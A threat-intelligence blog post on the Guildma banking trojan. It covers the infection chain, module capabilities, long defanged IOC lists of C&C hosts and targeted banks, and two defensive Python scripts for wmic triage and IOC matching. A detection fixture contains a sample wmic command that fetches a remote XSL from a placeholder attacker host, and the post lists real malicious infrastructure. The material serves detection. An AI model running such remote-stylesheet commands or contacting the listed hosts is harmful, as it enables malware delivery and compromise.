Guildma Remote Access Trojan

Guildma is a modular remote access trojan targeting financial and governmental organisations. First observed in 2015 in campaigns primarily targeting South America, Guildma began to see use in a range of global campaigns starting in May 2019.

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar messages, each carrying a ZIP archive that contains a malicious LNK file. Opening the LNK abuses the Windows Management Instrumentation Command-line tool (wmic.exe) to silently fetch a malicious XSL stylesheet, which wmic then executes. The XSL downloads the remaining Guildma modules and runs the first-stage loader, which in turn loads the rest. From that point the malware is active and waits either for commands from the C&C server or for specific user actions, such as opening the web page of one of the targeted banks.
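The step that gives defenders the earliest foothold in this chain is wmic.exe applying a stylesheet it did not ship with. wmic's /format parameter accepts a path or URL to an XSL file and will run script embedded in it, which is why an LNK can use it to fetch and execute a remote XSL. The triage below is an added example, not code from the original post or from any Guildma analysis: it runs over constructed process-creation records in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine) and flags wmic invocations whose /format value is a URL, a UNC path, or a local file outside the wbem directory where the built-in stylesheets (csv.xsl, htable.xsl and so on) live. The host attacker.invalid and all command lines are made up for the sample; the page gives no wmic command line of its own.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation records (Sysmon Event ID 1 shape). These are
# not telemetry from a real infection; attacker.invalid is a placeholder.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",            # benign built-in format
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get caption /format:list"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",            # remote XSL via URL
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'wmic process get brief /format:"http://attacker.invalid/stage1.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",            # dropped XSL in a user-writable path
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wmic os get /format:C:\Users\Public\Libraries\s.xsl"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",            # built-in stylesheet by full path
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic os get /format:C:\Windows\System32\wbem\csv.xsl"},
    {"Image": r"C:\Windows\System32\notepad.exe",              # not wmic, must be ignored
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe /format:http://attacker.invalid/x.xsl"},
]

# /format:VALUE or /format:"VALUE"; wmic switches are case-insensitive.
FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)
# Directory holding Windows' own stylesheets; anything else is suspect.
WBEM_DIR = "c:\\windows\\system32\\wbem\\"


def classify_format_arg(value: str) -> Optional[str]:
    """Return a reason string if the /format value points at a non-built-in stylesheet, else None."""
    v = value.strip().lower()
    if "://" in v or v.startswith("\\\\"):
        return "remote stylesheet"
    v = v.replace("/", "\\")
    # Bare names such as 'list', 'csv' or 'htable.xsl' resolve to the built-in set.
    if "\\" in v and not v.startswith(WBEM_DIR):
        return "stylesheet outside the wbem directory"
    return None


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Return (event index, /format value, reason) for each suspicious wmic launch."""
    hits: List[Tuple[int, str, str]] = []
    for i, ev in enumerate(events):
        if not ev.get("Image", "").lower().endswith("\\wmic.exe"):
            continue
        m = FORMAT_ARG.search(ev.get("CommandLine", ""))
        if not m:
            continue
        reason = classify_format_arg(m.group(1))
        if reason is None:
            continue
        # explorer.exe as parent is what a double-clicked shortcut looks like.
        if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
            reason += "; launched from explorer.exe (consistent with a double-clicked shortcut)"
        hits.append((i, m.group(1), reason))
    return hits


if __name__ == "__main__":
    for idx, value, why in triage(SAMPLE_EVENTS):
        print(f"event {idx}: /format:{value} -> {why}")
```

Two caveats when turning this into a production rule: the value can also be written with environment variables or 8.3 short names, so normalise the path before comparing it with the wbem directory, and on recent Windows releases wmic.exe is deprecated and may be absent altogether, in which case any execution of it is worth a look.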

Once installed, Guildma collects user and system information, sends it to a command and control server and then awaits further commands. Its modules can monitor email and messaging applications, record audio and video, steal account credentials and install secondary payloads. It also watches browser activity and attempts to phish credentials whenever the user visits a targeted banking website.

The phishing emails that spread Guildma are mostly sent from rented or purchased web hosting, or from compromised websites into which the operators install or copy malicious PHP code with mass-mailing functions. The authors usually use a custom PHP shell built around a simple mail function with a specific header.

Indicators of Compromise

A.1 Server list 1

hxxp://megatronico.xn--6frz82g/09/dsct.txt?vx=0137
hxxp://xn--80aaalggjw6a2a.site/09/dsct.txt?vx=0137
hxxp://xn--lckko7eri8b.pw/09/dsct.txt?vx=0137
hxxp://megatronico.club/09/dsct.txt?vx=0137
hxxp://megatronico.fun/09/dsct.txt?vx=0137
hxxp://megatronico.pw/09/dsct.txt?vx=0137
hxxp://megatronico.site/09/dsct.txt?vx=0137
hxxp://megatronico.xyz/09/dsct.txt?vx=0137
hxxp://newswtc106.com/09/dsct.txt?vx=0137
hxxp://magmonsterx1.xyz/09/dsct.txt?vx=0137
hxxp://sisssnetttx1.com/09/dsct.txt?vx=0137
hxxp://magmonsterx2.xyz/09/dsct.txt?vx=0137
hxxp://sisssnetttx2.com/09/dsct.txt?vx=0137
hxxp://magmonsterx3.xyz/09/dsct.txt?vx=0137
hxxp://sisssnetttx4.com/09/dsct.txt?vx=0137
hxxp://sisssnetttx5.com/09/dsct.txt?vx=0137
hxxp://sisssnetttx77.thaieasydns.com/09/dsct.txt?vx=0137
hxxp://sisssnetttx88.compress.to/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.info/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.net/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.net.br/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.in/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.website/09/dsct.txt?vx=0137
hxxp://sisssnetttx0xix0.com/09/dsct.txt?vx=0137

A.2 Server list 2

hxxp://storage.googleapis.com/tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/carbon-syntax-605.appspot.com/137/9/dados.txt
hxxp://tx141radx137.xyz//9/dados.txt
hxxp://storage.googleapis.com/1tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/2tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/3tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/4tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/5tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/6tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/7tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/8tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/9tx141radx137/9/dados.txt

A.3 TaskKill

taskkill /f /im iexplore.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im opera.exe
taskkill /f /im safari.exe
taskkill /f /im MicrosoftEdge.exe
taskkill /f /im AplicativoBradesco.exe
taskkill /f /im itauaplicativo.exe
taskkill /f /im java.exe
taskkill /f /im javaw.exe

A.4 File paths

C:\Program Files\Internet Explorer\iexplorer.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files\Diebold\Warsaw\core.exe
C:\Program Files\Diebold\Warsaw\mw.dbd
C:\Program Files\Diebold\Warsaw\gas.dbd
C:\Program Files\Diebold\Warsaw\gas.hisc
C:\Program Files\Diebold\Warsaw\local.data
C:\Program Files (x86)\Diebold\Warsaw\core.exe
C:\Program Files\Diebold\Warsaw\unins000.exe
C:\Program Files (x86)\Diebold\Warsaw\unins000.exe
C:\Program Files\Banco do Brasil\Assinatura Digital\bb-smartcards.exe
C:\Program Files (x86)\Banco do Brasil\Assinatura Digital\bb-smartcards.exe
C:\Program Files\AVAST Software\Avast\aswRunDll.exe
C:\Program Files (x86)\AVAST Software\Avast\aswRunDll.exe
C:\Program Files\AppBrad\AplicativoBradesco.exe
C:\Program Files (x86)\AppBrad\AplicativoBradesco.exe
C:\Users\%username$\AppData\Local\Aplicativo Itau\itauaplicativo.exe
C:\Sicoobnet\office.exe
C:\Windows\System32\regsvr32.exe
\raptor\rakpat0rpcackg.gif
\raptor\rakpat0rpcack64.~
\raptor\rakpat0rpcack98.~
\raptor\rakpat0rpcackgx.gif
\raptor\rakpat0rpcackxb.~

A.5 Version 139: targeted online bank services

Argentina:

bancodecomercio.com[.]ar
bancoprovincia
santanderrio.com[.]ar
bancogalicia[.]com
bbvafrances.com[.]ar
macro.com[.]ar
hsbc.com[.]ar
bancocredicoop[.]coop
bancopatagonia[.]com
privatebank.citibank[.]com
hipotecario.com[.]ar
bancor.com[.]ar
supervielle.com[.]ar
bancosantafe.com[.]ar
bancosanjuan[.]com
itau.com[.]ar
comafi.com[.]ar
bancodelapampa.com[.]ar
bse.com[.]ar
bancoentrerios.com[.]ar
bancochubut.com[.]ar
bancotucuman.com[.]ar
bancodecorrientes.com[.]ar
nbch.com[.]ar
bice.com[.]ar
bpn.com[.]ar
bancoformosa.com[.]ar
bancocolumbia.com[.]ar
bancopiano.com[.]ar
bancosantacruz[.]com
bancocmf.com[.]ar
mariva.com[.]ar
bst.com[.]ar
bancosaenz.com[.]ar
bancobic[.]ao
redlink.com[.]ar

Colombia:

colpatria[.]com
davivienda[.]com
grupobancolombia[.]com
bancopopular.com[.]co
bancodeoccidente.com[.]co
bancodebogota[.]com
bancocorpbanca.com[.]co
bancocajasocial[.]com
avvillas.com[.]co

Chile:

bancoestado[.]cl
bancochile[.]cl
login.bancochile[.]cl
bancocredichile[.]cl
santander[.]cl
banco.itau[.]cl
bci[.]cl
bice[.]cl
bancofalabella[.]cl
bancoedwards[.]cl
bancoripley[.]cl
corpbanca[.]cl
rbsbank[.]cl
bancosecurity[.]cl
bancopenta[.]cl
bancoparis[.]cl

Peru:

bancomercio.com[.]pe
corpebank2.icbc.com[.]cn
viabcp[.]com
banbif.com[.]pe
pichincha[.]pe
bbvacontinental[.]pe
interbank[.]pe
mibanco.com[.]pe
scotiabank.com[.]pe
bancognb.com[.]pe
bancofalabella[.]pe
bancoripley.com[.]pe
santander.com[.]pe
bancoazteca.com[.]pe
momentosbancocencosud[.]pe
visanet.com[.]pe

Ecuador:

pichincha[.]com
bancoguayaquil[.]com
bolivariano[.]com
bancomachala[.]com
bancodeloja.fin[.]ec
bcmanabi[.]com
banco-solidario[.]com
bancodelpacifico[.]com
bancopromerica[.]ec
bancodelaustro[.]com
bancoamazonas[.]com
unibanco[.]ec
bgr.com[.]ec
latam.citibank[.]com
bancocapital[.]com
bancointernacional.com[.]ec
bancofinca[.]com
produbanco[.]com
procreditecuador[.]com
coopnacional[.]com
cofiec.fin[.]ec

Uruguay:

bbva.com[.]uy
bps.gub[.]uy
brou.com[.]uy
santander.com[.]uy
itau.com[.]uy

China:

cncbinternational[.]com
citibank.com[.]cn
hsbc.com[.]cn
icbc.com[.]cn
boc[.]cn

Europe:

itau[.]eu
bbva[.]com
jpmorgan
bnpparibas
spdb.com[.]cn
bportugal[.]pt
santandertotta[.]pt
bancobpi[.]pt
deutschebank
bankinter[.]pt
barclays
millenniumbcp[.]pt
credit-suisse[.]com
privatbank[.]ua
novobanco[.]pt
popularbank[.]com
bancopopular

B. Module F

B.1 1-level C&Cs

analiticsx001x[.]xyz
maisgoldww[.]xxxy[.]info
analiticsx002x[.]xyz
ghethetgdsx01[.]gettrials[.]com
wertwert918[.]xxxy[.]info
zdfgwtwertahok2[.]info
analiticsx003[.]com
ewrtrtoldww[.]xxxy[.]info
analiticsx004[.]xyz
analiticsx005[.]info
analiticsx006[.]com
analiticsx007[.]net
analiticsx008[.]website
analiticsx009[.]online
analiticsx0010[.]com
<number>danaliticsx00220a[.]com (up to 30analiticsx00220a[.]com)

C. XSL

C.1 Server list

02/2019 v137

cavaleira1[.]website
cavaleira2[.]pw
cavaleira3[.]space
cavaleira4[.]fun
cavaleira5[.]site
cavaleira6[.]xyz
davidguetta01[.]website
davidguetta02[.]pw
davidguetta03[.]space
davidguetta04[.]fun
davidguetta05[.]site
davidguetta06[.]xyz

03/2019 v137

budweiser01[.]website
budweiser02[.]pw
budweiser03[.]space
budweiser04[.]fun
budweiser05[.]site
budweiser06[.]xyz
chromiunxede[.]pw
chromiunxewaa[.]website
chromiunxjdkhy[.]fun
chromiunxjst[.]site
chromiunxkla[.]space
chromiunxkla[.]work
chromiunxma[.]xyz
chromiunxvr[.]club

04/2019 v138

americanterrier01[.]website
americanterrier02[.]pw
americanterrier03[.]space
americanterrier04[.]fun
americanterrier05[.]site
americanterrier06[.]xyz
residentevil01[.]website
residentevil02[.]pw
residentevil03[.]space
residentevil04[.]fun
residentevil05[.]site
residentevil06[.]xyz
shaokahn01[.]website
shaokahn02[.]pw
shaokahn03[.]space
shaokahn04[.]fun
shaokahn05[.]site
shaokahn06[.]xyz

04/2019 v139

hxxps://raw.githubusercontent[.]com/winsvrx/x/master/

05/2019 v139

hxxps://storage.googleapis[.]com/ultramaker/

06/2019 v140

hxxps://storage.googleapis[.]com/bradok/

C.2 Downloaded file names

<version_specific_string>(a|b|c|dwwn|dx|e|f|g|gx|xa|xb|98|hh).(jpg|gif|dll|~)

D. Module C

D.1 Server list

aventadorx7[.]com
aventadorx9[.]com
aventadorxkw1[.]net
aventadorxkw2[.]net
aventadorxkw3[.]net
dynamic6666[.]com
magmonsterx1[.]xyz
magmonsterx2[.]xyz
magmonsterx3[.]xyz
newswtc106[.]com
sisssnetttx1[.]com
sisssnetttx2[.]com
sisssnetttx3[.]com
sisssnetttx4[.]com
sisssnetttx5[.]com
sisssnetttx6[.]in
sisssnetttx6[.]info
sisssnetttx6[.]net
sisssnetttx6[.]net.br
sisssnetttx6[.]website
sisssnetttx77.thaieasydns[.]com
sisssnetttx88.compress[.]to
valhalax0xix0[.]com
valhalaxtz1[.]info
valhalaxtz2[.]pw
valhalaxtz3[.]website
valhalaxtz4[.]xyz
valhalaxtzx77.thaieasydns[.]com

D.2 Targeted web email services

mail.live[.]com
outlook.live[.]com
login.live[.]com
email.uol[.]com.br
mail.uol[.]com.br
mail.yahoo[.]com
login.yahoo[.]com
mail.google[.]com
accounts.google[.]com
mail.terra[.]com.br

Patterns of interest

:2095
/webmail
/admin

D.3 Targeted social sites/media

facebook[.]com
twitter[.]com
instagram[.]com
netflix[.]com

D.4 Targeted payment services

paypal[.]com
pagseguro.uol[.]com.br
serasaexperian[.]com.br
sitenet.serasa[.]com.br
servicos.spc[.]org.br

D.5 Targeted e-commerce/e-shops

aliexpress[.]com
amazon[.]com
ebay[.]com
ricardoeletro[.]com
walmart[.]com
magazineluiza[.]com
americanas[.]com.br
efacil[.]com.br
clubedoricardo[.]com.br
connectparts[.]com.br
passarela[.]com.br
shoptime[.]com.br
kanui[.]com.br
ebit[.]com.br
compracerta[.]com.br
panvel[.]com
groupon[.]com.br
boticario[.]com.br
pontofrio[.]com.br
centauro[.]com.br
peixeurbano[.]com.br
lojasrenner[.]com.br
store.sony[.]com.br
comprafacil[.]com.br
maxmilhas[.]com.br
zattini[.]com.br
avon[.]com.br
decolar[.]com
colombo[.]com.br
mercadopago[.]com
mercadolivre[.]com
extra[.]com.br
ultrafarma[.]com.br
kabum[.]com.br
netshoes[.]com.br
paquetaesportes[.]com.br
buscape[.]com.br
chillibeans[.]com.br
casasbahia[.]com.br
dafiti[.]com.br

D.6 Miscellaneous targeted URLs

uolhost[.]com
painelhost.uol[.]com.br
locaweb[.]com.br
grupobci[.]com.br
bvsnet[.]com.br
servicos.spc[.]org.br
voeazul[.]com.br
voegol[.]com.br
tam[.]com.br
submarino[.]com.br
godaddy[.]com
gmx[.]com
ig[.]com.br
ogin.r7[.]com

E. Module DWWN

E.1 Server list

megatronico[.]xn--6frz82g  (IDN address megatronico[.]移动)
xn--80aaalggjw6a2a[.]site  (IDN address казагранде[.]site)
xn--lckko7eri8b[.]pw       (IDN address カサグランデ[.]pw)
megatronico[.]club
megatronico[.]fun
megatronico[.]pw
megatronico[.]site
megatronico[.]xyz
newswtc106[.]com
magmonsterx1[.]xyz
sisssnetttx1[.]com
magmonsterx2[.]xyz
sisssnetttx2[.]com
magmonsterx3[.]xyz
sisssnetttx4[.]com
sisssnetttx5[.]com
sisssnetttx77[.]thaieasydns[.]com
sisssnetttx88[.]compress[.]to
sisssnetttx6[.]info
sisssnetttx6[.]net
sisssnetttx6[.]net[.]br
sisssnetttx6[.]in
sisssnetttx6[.]website
sisssnetttx0xix0[.]com
[41..50]sisssnetttx0xix0[.]com
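The indicator lists above mix several notations: hxxp:// schemes with full paths (A.1, A.2, C.1), [.]-defanged bare hosts (B.1, D.1), punycode hosts with their Unicode form in parentheses (E.1), the [41..50] numeric-prefix shorthand (E.1) and the module file-name pattern of C.2. The script below is an added example, not part of the original post: it normalises those forms into a set of matchable hostnames, expands the numeric range, decodes punycode labels for analyst display, matches a few constructed DNS query lines against the set, and turns the C.2 pattern into a regex anchored on a known version-specific prefix (the A.4 paths show that prefix is rakpat0rpcack for the version listed there). The sample IOC strings are copied from the lists above; the DNS log lines are constructed. Two things worth noting: the storage.googleapis.com and raw.githubusercontent.com entries are shared hosts and are only useful as full URLs with bucket or path, so they are deliberately not fed into the host set; and the A.4 path rakpat0rpcack64.~ uses a suffix (64) that the C.2 pattern does not list, so the regex rejects it, which is a reminder that the pattern on the page is version-specific.

```python
import re
from typing import Dict, Iterable, List, Set, Tuple
from urllib.parse import urlsplit

# IOC strings copied verbatim from the lists on this page, in their mixed notations.
SAMPLE_IOCS: List[str] = [
    "hxxp://megatronico.club/09/dsct.txt?vx=0137",                  # A.1 form
    "sisssnetttx77.thaieasydns[.]com",                              # D.1 form
    "Megatronico[.]xn--6frz82g  (IDN address megatronico[.]移动)",   # E.1 form
    "[41..50]sisssnetttx0xix0[.]com",                               # E.1 range shorthand
]

# Constructed DNS query log lines: "<timestamp> <client> <qname> <qtype>".
SAMPLE_DNS_LOG: List[str] = [
    "2019-05-06T10:02:11Z 10.0.0.5 megatronico.club. A",
    "2019-05-06T10:02:12Z 10.0.0.5 45sisssnetttx0xix0.com. A",
    "2019-05-06T10:02:13Z 10.0.0.5 cdn.megatronico.xn--6frz82g. A",
    "2019-05-06T10:02:14Z 10.0.0.5 www.example.com. A",
    "2019-05-06T10:02:15Z 10.0.0.5 storage.googleapis.com. A",   # shared host, not in the set
]

DEFANG_SCHEME = re.compile(r"^hxxps?://", re.IGNORECASE)
RANGE_PREFIX = re.compile(r"^\[(\d+)\.\.(\d+)\](.+)$")


def expand(ioc: str) -> List[str]:
    """Expand the '[41..50]host' shorthand into one IOC per number; pass others through."""
    m = RANGE_PREFIX.match(ioc.strip())
    if not m:
        return [ioc.strip()]
    lo, hi, rest = int(m.group(1)), int(m.group(2)), m.group(3)
    return [f"{n}{rest}" for n in range(lo, hi + 1)]


def refang_host(ioc: str) -> str:
    """Return the lower-cased hostname from a defanged IOC (scheme, path and notes dropped)."""
    s = ioc.strip().split()[0]                      # drop trailing "(IDN address ...)" notes
    s = DEFANG_SCHEME.sub("http://", s).replace("[.]", ".")
    if "://" not in s:
        s = "http://" + s                           # bare hosts need a scheme for urlsplit
    return (urlsplit(s).hostname or "").lower()


def build_hostset(iocs: Iterable[str]) -> Set[str]:
    return {h for ioc in iocs for item in expand(ioc) if (h := refang_host(item))}


def idn_display(host: str) -> str:
    """Decode xn-- labels to Unicode for display; keep the ASCII label if it does not round-trip."""
    labels = []
    for label in host.split("."):
        if label.lower().startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass
        labels.append(label)
    return ".".join(labels)


def match_dns_log(lines: Iterable[str], hosts: Set[str]) -> List[Tuple[str, str]]:
    """Return (queried name, matched IOC host) where the name equals or is under an IOC host."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        qname = fields[2].rstrip(".").lower()
        for h in hosts:
            if qname == h or qname.endswith("." + h):
                hits.append((qname, h))
                break
    return hits


# Module suffixes from C.2, longest first so alternation cannot stop at a prefix of a longer one.
MODULE_SUFFIXES = ("dwwn", "gx", "xa", "xb", "hh", "dx", "98", "a", "b", "c", "e", "f", "g")


def module_file_re(version_prefix: str) -> "re.Pattern[str]":
    """Regex for '<version_specific_string>(suffix).(jpg|gif|dll|~)' with a known prefix."""
    alt = "|".join(MODULE_SUFFIXES)
    return re.compile(rf"^{re.escape(version_prefix)}(?P<module>{alt})\.(?P<ext>jpg|gif|dll|~)$",
                      re.IGNORECASE)


if __name__ == "__main__":
    hosts = build_hostset(SAMPLE_IOCS)
    for qname, ioc in match_dns_log(SAMPLE_DNS_LOG, hosts):
        print(f"{qname} -> {ioc} ({idn_display(ioc)})")
    pat = module_file_re("rakpat0rpcack")
    for name in ("rakpat0rpcackgx.gif", "rakpat0rpcackxb.~", "rakpat0rpcack64.~"):
        m = pat.match(name)
        print(name, "->", m.group("module") if m else "no match")
```

Matching on the hostname alone is the right granularity for the attacker-registered domains in A.1, B.1, D.1 and E.1; for the Google Cloud Storage and GitHub entries in A.2 and C.1, match the full URL (bucket or repository path) in proxy logs instead, or the rule will fire on every legitimate use of those services.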

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.
